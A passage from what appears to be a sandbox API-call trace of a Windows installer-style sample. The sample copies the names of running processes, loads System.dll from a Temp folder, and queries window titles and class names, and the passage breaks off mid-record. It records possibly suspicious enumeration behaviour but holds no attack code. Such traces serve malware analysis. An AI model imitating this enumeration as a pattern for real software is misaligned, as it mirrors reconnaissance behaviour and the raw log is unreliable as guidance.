[0158.423] lstrcpyA (in: lpString1=0x430000, lpString2="23" | out: lpString1="23") returned="23" [0158.423] lstrcpyA (in: lpString1=0x33e508, lpString2="3329112" | out: lpString1="3329112") returned="3329112" [0158.424] lstrcpyA (in: lpString1=0x431800, lpString2="2000" | out: lpString1="2000") returned="2000" [0158.424] lstrcpyA (in: lpString1=0x430800, lpString2="3329424" | out: lpString1="3329424") returned="3329424" [0158.424] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.424] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.424] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.424] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.424] lstrcpyA (in: lpString1=0x431400, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0158.424] lstrcpyA (in: lpString1=0x430000, lpString2="35" | out: lpString1="35") returned="35" [0158.424] lstrcpyA (in: lpString1=0x33e508, lpString2="3329496" | out: lpString1="3329496") returned="3329496" [0158.424] lstrcpyA (in: lpString1=0x431800, lpString2="1088" | out: lpString1="1088") returned="1088" [0158.424] lstrcpyA (in: lpString1=0x430800, lpString2="3329808" | out: lpString1="3329808") returned="3329808" [0158.424] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.424] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.424] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.425] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.425] lstrcpyA (in: lpString1=0x431400, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0158.425] lstrcpyA (in: lpString1=0x430000, lpString2="15" | out: lpString1="15") returned="15" [0158.425] lstrcpyA (in: lpString1=0x33e508, lpString2="3329840" | out: lpString1="3329840") returned="3329840" [0158.425] lstrcpyA (in: lpString1=0x431800, lpString2="860" | out: lpString1="860") returned="860" [0158.425] lstrcpyA (in: lpString1=0x430800, lpString2="3330152" | out: lpString1="3330152") returned="3330152" [0158.425] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.425] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.425] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.425] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.425] lstrcpyA (in: lpString1=0x431400, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0158.425] lstrcpyA (in: lpString1=0x430000, lpString2="14" | out: lpString1="14") returned="14" [0158.425] lstrcpyA (in: lpString1=0x33e508, lpString2="3330184" | out: lpString1="3330184") returned="3330184" [0158.426] lstrcpyA (in: lpString1=0x431800, lpString2="560" | out: lpString1="560") returned="560" [0158.426] lstrcpyA (in: lpString1=0x430800, lpString2="3330496" | out: lpString1="3330496") returned="3330496" [0158.426] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.426] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.426] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.426] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.426] lstrcpyA (in: lpString1=0x431400, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0158.426] lstrcpyA (in: lpString1=0x430000, lpString2="8" | out: lpString1="8") returned="8" [0158.426] lstrcpyA (in: lpString1=0x33e508, lpString2="3330512" | out: lpString1="3330512") returned="3330512" [0158.426] lstrcpyA (in: lpString1=0x431800, lpString2="1216" | out: lpString1="1216") returned="1216" [0158.426] lstrcpyA (in: lpString1=0x430800, lpString2="3330824" | out: lpString1="3330824") returned="3330824" [0158.426] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.426] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.426] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.426] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.427] lstrcpyA (in: lpString1=0x431400, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0158.427] lstrcpyA (in: lpString1=0x430000, lpString2="35" | out: lpString1="35") returned="35" [0158.427] lstrcpyA (in: lpString1=0x33e508, lpString2="3330896" | out: lpString1="3330896") returned="3330896" [0158.427] lstrcpyA (in: lpString1=0x431800, lpString2="1180" | out: lpString1="1180") returned="1180" [0158.427] lstrcpyA (in: lpString1=0x430800, lpString2="3331208" | out: lpString1="3331208") returned="3331208" [0158.427] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.427] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.427] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.427] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.427] lstrcpyA (in: lpString1=0x431400, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0158.427] lstrcpyA (in: lpString1=0x430000, lpString2="23" | out: lpString1="23") returned="23" [0158.427] lstrcpyA (in: lpString1=0x33e508, lpString2="3331256" | out: lpString1="3331256") returned="3331256" [0158.427] lstrcpyA (in: lpString1=0x431800, lpString2="328" | out: lpString1="328") returned="328" [0158.427] lstrcpyA (in: lpString1=0x430800, lpString2="3331568" | out: lpString1="3331568") returned="3331568" [0158.427] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.428] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.428] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.428] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.428] lstrcpyA (in: lpString1=0x431400, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0158.428] lstrcpyA (in: lpString1=0x430000, lpString2="18" | out: lpString1="18") returned="18" [0158.428] lstrcpyA (in: lpString1=0x33e508, lpString2="3331608" | out: lpString1="3331608") returned="3331608" [0158.428] lstrcpyA (in: lpString1=0x431800, lpString2="564" | out: lpString1="564") returned="564" [0158.428] lstrcpyA (in: lpString1=0x430800, lpString2="3331920" | out: lpString1="3331920") returned="3331920" [0158.428] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.428] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.428] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.428] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.428] lstrcpyA (in: lpString1=0x431400, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0158.428] lstrcpyA (in: lpString1=0x430000, lpString2="20" | out: lpString1="20") returned="20" [0158.428] lstrcpyA (in: lpString1=0x33e508, lpString2="3331960" | out: lpString1="3331960") returned="3331960" [0158.428] lstrcpyA (in: lpString1=0x431800, lpString2="1276" | out: lpString1="1276") returned="1276" [0158.428] lstrcpyA (in: lpString1=0x430800, lpString2="3332272" | out: lpString1="3332272") returned="3332272" [0158.429] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.429] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.429] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.429] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.429] lstrcpyA (in: lpString1=0x431400, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0158.429] lstrcpyA (in: lpString1=0x430000, lpString2="11" | out: lpString1="11") returned="11" [0158.429] lstrcpyA (in: lpString1=0x33e508, lpString2="3332296" | out: lpString1="3332296") returned="3332296" [0158.429] lstrcpyA (in: lpString1=0x431800, lpString2="1392" | out: lpString1="1392") returned="1392" [0158.429] lstrcpyA (in: lpString1=0x430800, lpString2="3332608" | out: lpString1="3332608") returned="3332608" [0158.429] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.430] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.430] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.430] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.430] lstrcpyA (in: lpString1=0x431400, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0158.430] lstrcpyA (in: lpString1=0x430000, lpString2="17" | out: lpString1="17") returned="17" [0158.430] lstrcpyA (in: lpString1=0x33e508, lpString2="3332648" | out: lpString1="3332648") returned="3332648" [0158.430] lstrcpyA (in: lpString1=0x431800, lpString2="712" | out: lpString1="712") returned="712" [0158.430] lstrcpyA (in: lpString1=0x430800, lpString2="3332960" | out: lpString1="3332960") returned="3332960" [0158.430] lstrcpyA (in: lpString1=0x431000, lpString2="368" | out: lpString1="368") returned="368" [0158.431] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.431] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.431] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.431] lstrcpyA (in: lpString1=0x431400, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0158.431] lstrcpyA (in: lpString1=0x430000, lpString2="28" | out: lpString1="28") returned="28" [0158.431] lstrcpyA (in: lpString1=0x33e508, lpString2="3333016" | out: lpString1="3333016") returned="3333016" [0158.431] lstrcpyA (in: lpString1=0x431800, lpString2="1744" | out: lpString1="1744") returned="1744" [0158.431] lstrcpyA (in: lpString1=0x430800, lpString2="3333328" | out: lpString1="3333328") returned="3333328" [0158.431] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.431] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.431] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.431] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.431] lstrcpyA (in: lpString1=0x431400, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0158.431] lstrcpyA (in: lpString1=0x430000, lpString2="23" | out: lpString1="23") returned="23" [0158.432] lstrcpyA (in: lpString1=0x33e508, lpString2="3333376" | out: lpString1="3333376") returned="3333376" [0158.432] lstrcpyA (in: lpString1=0x431800, lpString2="1680" | out: lpString1="1680") returned="1680" [0158.432] lstrcpyA (in: lpString1=0x430800, lpString2="3333688" | out: lpString1="3333688") returned="3333688" [0158.432] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.432] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.432] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.432] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.432] lstrcpyA (in: lpString1=0x431400, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0158.432] lstrcpyA (in: lpString1=0x430000, lpString2="19" | out: lpString1="19") returned="19" [0158.432] lstrcpyA (in: lpString1=0x33e508, lpString2="3333728" | out: lpString1="3333728") returned="3333728" [0158.432] lstrcpyA (in: lpString1=0x431800, lpString2="388" | out: lpString1="388") returned="388" [0158.432] lstrcpyA (in: lpString1=0x430800, lpString2="3334040" | out: lpString1="3334040") returned="3334040" [0158.432] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.433] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.433] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.433] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.433] lstrcpyA (in: lpString1=0x431400, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0158.433] lstrcpyA (in: lpString1=0x430000, lpString2="36" | out: lpString1="36") returned="36" [0158.433] lstrcpyA (in: lpString1=0x33e508, lpString2="3334112" | out: lpString1="3334112") returned="3334112" [0158.433] lstrcpyA (in: lpString1=0x431800, lpString2="2476" | out: lpString1="2476") returned="2476" [0158.433] lstrcpyA (in: lpString1=0x430800, lpString2="3336280" | out: lpString1="3336280") returned="3336280" [0158.433] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.433] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.433] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.433] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.433] lstrcpyA (in: lpString1=0x431400, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0158.433] lstrcpyA (in: lpString1=0x430000, lpString2="10" | out: lpString1="10") returned="10" [0158.433] lstrcpyA (in: lpString1=0x33e508, lpString2="3336304" | out: lpString1="3336304") returned="3336304" [0158.433] lstrcpyA (in: lpString1=0x431800, lpString2="2516" | out: lpString1="2516") returned="2516" [0158.434] lstrcpyA (in: lpString1=0x430800, lpString2="3336872" | out: lpString1="3336872") returned="3336872" [0158.434] lstrcpyA (in: lpString1=0x431000, lpString2="592" | out: lpString1="592") returned="592" [0158.434] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.434] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.434] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.434] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.434] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.434] lstrcpyA (in: lpString1=0x33e508, lpString2="3336896" | out: lpString1="3336896") returned="3336896" [0158.434] lstrcpyA (in: lpString1=0x431800, lpString2="2552" | out: lpString1="2552") returned="2552" [0158.434] lstrcpyA (in: lpString1=0x430800, lpString2="3337464" | out: lpString1="3337464") returned="3337464" [0158.434] lstrcpyA (in: lpString1=0x431000, lpString2="592" | out: lpString1="592") returned="592" [0158.434] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.434] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.434] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.434] lstrcpyA (in: lpString1=0x431400, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0158.434] lstrcpyA (in: lpString1=0x430000, lpString2="11" | out: lpString1="11") returned="11" [0158.434] lstrcpyA (in: lpString1=0x33e508, lpString2="3337488" | out: lpString1="3337488") returned="3337488" [0158.435] lstrcpyA (in: lpString1=0x431800, lpString2="2592" | out: lpString1="2592") returned="2592" [0158.435] lstrcpyA (in: lpString1=0x430800, lpString2="3337992" | out: lpString1="3337992") returned="3337992" [0158.435] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.435] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.435] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.435] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.435] lstrcpyA (in: lpString1=0x431400, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0158.435] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.435] lstrcpyA (in: lpString1=0x33e508, lpString2="3338016" | out: lpString1="3338016") returned="3338016" [0158.435] lstrcpyA (in: lpString1=0x431800, lpString2="2624" | out: lpString1="2624") returned="2624" [0158.435] lstrcpyA (in: lpString1=0x430800, lpString2="3338968" | out: lpString1="3338968") returned="3338968" [0158.435] lstrcpyA (in: lpString1=0x431000, lpString2="976" | out: lpString1="976") returned="976" [0158.435] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.435] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.435] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.436] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.436] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.436] lstrcpyA (in: lpString1=0x33e508, lpString2="3338992" | out: lpString1="3338992") returned="3338992" [0158.436] lstrcpyA (in: lpString1=0x431800, lpString2="2948" | out: lpString1="2948") returned="2948" [0158.436] lstrcpyA (in: lpString1=0x430800, lpString2="3339496" | out: lpString1="3339496") returned="3339496" [0158.437] GlobalSize (hMem=0x33e100) returned 0x14a4 [0158.437] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrlenA (lpString="callback1") returned 9 [0158.437] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.437] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.437] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.437] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.437] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.437] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.437] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.437] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.437] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.437] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.437] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.437] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.438] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.438] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.438] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.438] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.438] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.438] lstrcpynA (in: lpString1=0x341200, lpString2="131390", iMaxLength=1024 | out: lpString1="131390") returned="131390" [0158.438] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.438] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.438] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.438] GetWindowTextA (in: hWnd=0x2013e, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0158.438] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.438] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.438] lstrcpyA (in: lpString1=0x430800, lpString2="Network Flyout" | out: lpString1="Network Flyout") returned="Network Flyout" [0158.438] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131390") returned 6 [0158.438] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.438] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.438] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.438] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.438] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.438] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.439] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.439] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.439] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.439] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.439] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.439] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.439] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.439] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.439] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.439] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: 